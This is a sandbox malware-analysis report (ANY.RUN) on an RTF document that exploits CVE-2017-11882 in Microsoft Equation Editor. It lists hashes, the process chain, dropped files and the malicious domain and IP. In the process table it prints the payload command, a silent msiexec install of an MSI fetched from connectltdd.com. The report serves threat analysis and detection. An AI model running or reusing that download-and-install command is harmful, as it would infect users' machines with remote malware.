analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

list.Doc

Full analysis: https://app.any.run/tasks/91118d6e-15fc-4bc4-99a5-224c24dde504
Verdict: Malicious activity
Analysis date: May 30, 2020, 10:06:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
exploit
CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, ANSI
MD5:

EFCF2AB5291B3D328587549223EDEBB0

SHA1:

D601EFFFE76F61E85C66D738224CB4B33FD5D650

SHA256:

9A1891E2EB4C7A4D9521D85B66F46D8A784B13A452BD55BAFB41617E9FC62FB0

SSDEEP:

96:M1ngfw0UG5VoWx2uwAnyRFVSZZnk8GEB9fNdXkzJy4hB81NS4oq:Gmw0UGZxvL2VSPnLdjXAJZ6NSRq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2372)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2968)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 2372)
    • Executed via COM

      • EQNEDT32.EXE (PID: 2372)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1140)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1140)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1140"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\list.Doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2372"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2968cmd.exe /c msiexec /q /i "https://connectltdd.com/s.msi"C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1619
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3976msiexec /q /i "https://connectltdd.com/s.msi"C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1619
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Total events
1 431
Read events
696
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
1140WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD412.tmp.cvr
MD5:
SHA256:
1140WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\list.Doc.rtf.LNKlnk
MD5:EA6F20E630100AF4C5938357992F9408
SHA256:145EED03CFA13B99D917F2F4A888238D7E623FDDFBDFC9B34F34BA2E6C4E5BF5
1140WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:E3123A6EF2B595B893D8E5AE570D124E
SHA256:6F5E89AA6AF7D1965E796F5617AD702B17595CF0ACA69885086749D70D390D1E
1140WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F51BF0C2C036CAAED2147B99D0AB5201
SHA256:5AC22066B667A57057EA94CB6CCEF25BBA9F2211DDE65B9DA8E3BFD37179D0D4
1140WINWORD.EXEC:\Users\admin\Desktop\~$st.Doc.rtfpgc
MD5:90924B7394483A4440FEE02BBE75728F
SHA256:3299CAA000387F0CB777E656F4AE7209F1B6E5B49750F2017E7ACC2F52454636
1140WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\80E1195C.wmfwmf
MD5:975B76E8E77D57CC386AF977A08B1E31
SHA256:8D80E9B9B39CD00F3BFADB3B2538DC46845FE8D0E7854D5DD9C9C381150DEDAD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3292
msiexec.exe
86.106.93.92:443
connectltdd.com
BelCloud Hosting Corporation
BG
unknown

DNS requests

Domain
IP
Reputation
connectltdd.com
  • 86.106.93.92
unknown

Threats

No threats detected
No debug info